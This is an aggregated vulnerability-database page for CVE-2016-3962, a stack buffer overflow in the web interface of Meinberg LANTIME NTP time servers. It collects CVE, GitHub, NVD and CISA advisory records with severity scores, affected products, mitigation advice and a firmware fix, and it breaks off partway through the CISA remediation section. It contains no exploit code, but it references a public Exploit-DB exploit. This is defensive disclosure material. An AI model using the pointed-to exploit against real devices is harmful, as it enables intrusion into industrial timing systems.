Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2016-3962 (GCVE-0-2016-3962)
Vulnerability from cvelistv5 – Published: 2016-07-03 14:00 – Updated: 2024-08-06 00:10- n/a
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:10:31.911Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "40120",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-06-23T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-09-02T09:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "40120",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-3962",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "40120",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03",
"refsource": "MISC",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-3962",
"datePublished": "2016-07-03T14:00:00",
"dateReserved": "2016-04-06T00:00:00",
"dateUpdated": "2024-08-06T00:10:31.911Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2016-3962\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2016-07-03T14:59:03.477\",\"lastModified\":\"2025-04-12T10:46:40.837\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.\"},{\"lang\":\"es\",\"value\":\"Desbordamiento de buffer basado en pila en la interfaz del servidor de tiempos NTP en los dispositivos Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100 y LCES con firmware en versiones anteriores a 6.20.004 permite a atacantes remotos obtener informaci\u00f3n sensible, modificar datos o causar una denegaci\u00f3n de servicio a trav\u00e9s de un par\u00e1metro manipulado en una petici\u00f3n POST.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":3.4}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:meinberg:ntp_server_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"6.0\",\"matchCriteriaId\":\"377250C6-1D48-4346-8510-DF0D28A165EB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C46E2EDA-91F4-45F9-8D2A-10A9D62F03DE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"41ED5895-83B1-4AAC-9527-8E9B4D0C479F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"62BAFFA6-97EE-4CFA-B608-20AA44A89DC7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"191DC313-A018-4512-8D4E-A6CFA85CDDFD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9B26DC35-0DA4-4BF5-A834-F7594F2D2512\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"34F245CC-C8AA-45EC-A254-D8D90511E98A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A5F06A9F-2C4B-4D42-8154-50B743C2EFF9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5400EDF7-2862-4B4D-9778-9A434F96777C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68CD8E8D-40DD-4D74-A8A5-341FCC4F3D34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B1C3E224-67BF-406E-BEAF-C19675F8B86D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D922465D-452B-4669-B2F8-56F777992FF3\"}]}]}],\"references\":[{\"url\":\"https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.exploit-db.com/exploits/40120/\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.exploit-db.com/exploits/40120/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
}
}
GHSA-WJMF-CVM2-JRWM
Vulnerability from github – Published: 2022-05-17 01:18 – Updated: 2025-04-12 13:01Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.
{
"affected": [],
"aliases": [
"CVE-2016-3962"
],
"database_specific": {
"cwe_ids": [
"CWE-119"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-07-03T14:59:00Z",
"severity": "HIGH"
},
"details": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.",
"id": "GHSA-wjmf-cvm2-jrwm",
"modified": "2025-04-12T13:01:42Z",
"published": "2022-05-17T01:18:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-3962"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/40120"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
FKIE_CVE-2016-3962
Vulnerability from fkie_nvd - Published: 2016-07-03 14:59 - Updated: 2025-04-12 10:46| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03 | Third Party Advisory, US Government Resource | |
| cve@mitre.org | https://www.exploit-db.com/exploits/40120/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/40120/ |
| Vendor | Product | Version | |
|---|---|---|---|
| meinberg | ntp_server_firmware | * | |
| meinberg | ims-lantime_m1000 | - | |
| meinberg | ims-lantime_m3000 | - | |
| meinberg | ims-lantime_m500 | - | |
| meinberg | lantime_m100 | - | |
| meinberg | lantime_m200 | - | |
| meinberg | lantime_m300 | - | |
| meinberg | lantime_m400 | - | |
| meinberg | lantime_m600 | - | |
| meinberg | lantime_m900 | - | |
| meinberg | lces | - | |
| meinberg | syncfire_1100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:meinberg:ntp_server_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "377250C6-1D48-4346-8510-DF0D28A165EB",
"versionEndIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C46E2EDA-91F4-45F9-8D2A-10A9D62F03DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "41ED5895-83B1-4AAC-9527-8E9B4D0C479F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "62BAFFA6-97EE-4CFA-B608-20AA44A89DC7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "191DC313-A018-4512-8D4E-A6CFA85CDDFD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9B26DC35-0DA4-4BF5-A834-F7594F2D2512",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "34F245CC-C8AA-45EC-A254-D8D90511E98A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A5F06A9F-2C4B-4D42-8154-50B743C2EFF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5400EDF7-2862-4B4D-9778-9A434F96777C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "68CD8E8D-40DD-4D74-A8A5-341FCC4F3D34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B1C3E224-67BF-406E-BEAF-C19675F8B86D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D922465D-452B-4669-B2F8-56F777992FF3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request."
},
{
"lang": "es",
"value": "Desbordamiento de buffer basado en pila en la interfaz del servidor de tiempos NTP en los dispositivos Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100 y LCES con firmware en versiones anteriores a 6.20.004 permite a atacantes remotos obtener informaci\u00f3n sensible, modificar datos o causar una denegaci\u00f3n de servicio a trav\u00e9s de un par\u00e1metro manipulado en una petici\u00f3n POST."
}
],
"id": "CVE-2016-3962",
"lastModified": "2025-04-12T10:46:40.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-07-03T14:59:03.477",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/40120/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
ICSA-16-175-03
Vulnerability from csaf_cisa - Published: 2016-03-27 06:00 - Updated: 2025-06-09 17:22Notes
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited",
"tlp": {
"label": "WHITE",
"url": "https://us-cert.cisa.gov/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "legal_disclaimer",
"text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
"title": "Legal Notice"
},
{
"category": "general",
"text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
"title": "CISA Disclaimer"
},
{
"category": "general",
"text": "CISA recommends users take defensive measures to minimize the risk of exploitation.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Locate control system networks and remote devices behind firewalls and isolating them from business networks.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.",
"title": "Recommended Practices"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "central@cisa.dhs.gov",
"name": "CISA",
"namespace": "https://www.cisa.gov/"
},
"references": [
{
"category": "self",
"summary": "ICS Advisory ICSA-16-175-03 JSON",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2016/icsa-16-175-03.json"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-16-175-03 - Web Version",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-16-175-03"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/topics/industrial-control-systems"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/sites/default/files/publications/Cybersecurity_Best_Practices_for_Industrial_Control_Systems.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/sites/default/files/publications/emailscams0905.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ncas/tips/ST04-014"
}
],
"title": "Meinberg NTP Time Server Vulnerabilities",
"tracking": {
"current_release_date": "2025-06-09T17:22:04.840219Z",
"generator": {
"date": "2025-06-09T17:22:04.840099Z",
"engine": {
"name": "CISA CSAF Generator",
"version": "1.0.0"
}
},
"id": "ICSA-16-175-03",
"initial_release_date": "2016-03-27T06:00:00.000000Z",
"revision_history": [
{
"date": "2016-03-27T06:00:00.000000Z",
"legacy_version": "Initial",
"number": "1",
"summary": "Initial Publication"
},
{
"date": "2025-06-09T17:22:04.840219Z",
"legacy_version": "CSAF Conversion",
"number": "2",
"summary": "Advisory converted into a CSAF"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg IMS-LANTIME M3000: \u003c=6.0",
"product_id": "CSAFPID-0001"
}
}
],
"category": "product_name",
"name": "IMS-LANTIME M3000"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg IMS-LANTIME M1000: \u003c=6.0",
"product_id": "CSAFPID-0002"
}
}
],
"category": "product_name",
"name": "IMS-LANTIME M1000"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg IMS-LANTIME M500: \u003c=6.0",
"product_id": "CSAFPID-0003"
}
}
],
"category": "product_name",
"name": "IMS-LANTIME M500"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M900: \u003c=6.0",
"product_id": "CSAFPID-0004"
}
}
],
"category": "product_name",
"name": "LANTIME M900"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M600: \u003c=6.0",
"product_id": "CSAFPID-0005"
}
}
],
"category": "product_name",
"name": "LANTIME M600"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M400: \u003c=6.0",
"product_id": "CSAFPID-0006"
}
}
],
"category": "product_name",
"name": "LANTIME M400"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M300: \u003c=6.0",
"product_id": "CSAFPID-0007"
}
}
],
"category": "product_name",
"name": "LANTIME M300"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M200: \u003c=6.0",
"product_id": "CSAFPID-0008"
}
}
],
"category": "product_name",
"name": "LANTIME M200"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LANTIME M100: \u003c=6.0",
"product_id": "CSAFPID-0009"
}
}
],
"category": "product_name",
"name": "LANTIME M100"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg SyncFire 1100: \u003c=6.0",
"product_id": "CSAFPID-0010"
}
}
],
"category": "product_name",
"name": "SyncFire 1100"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c=6.0",
"product": {
"name": "Meinberg LCES: \u003c=6.0",
"product_id": "CSAFPID-0011"
}
}
],
"category": "product_name",
"name": "LCES"
}
],
"category": "vendor",
"name": "Meinberg"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2016-3962",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "summary",
"text": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.",
"title": "Vulnerability Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
},
"remediations": [
{
"category": "mitigation",
"details": "Meinberg has produced a new firmware Version 6.20.004. The new firmware can be downloaded by using the link below: (https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e=)",
"product_ids": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
],
"url": "https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e="
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
"products": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
}
]
},
{
"cve": "CVE-2016-3988",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "summary",
"text": "Multiple stack-based buffer overflows in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allow remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.",
"title": "Vulnerability Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
},
"remediations": [
{
"category": "mitigation",
